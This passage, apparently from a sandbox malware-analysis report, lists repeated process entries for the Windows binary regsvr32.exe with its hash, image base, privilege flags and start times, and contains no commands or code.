Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff9d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 4 |
Start time: | 09:13:25 |
Start date: | 16/02/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff9d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 5 |
Start time: | 09:13:25 |
Start date: | 16/02/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff9d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |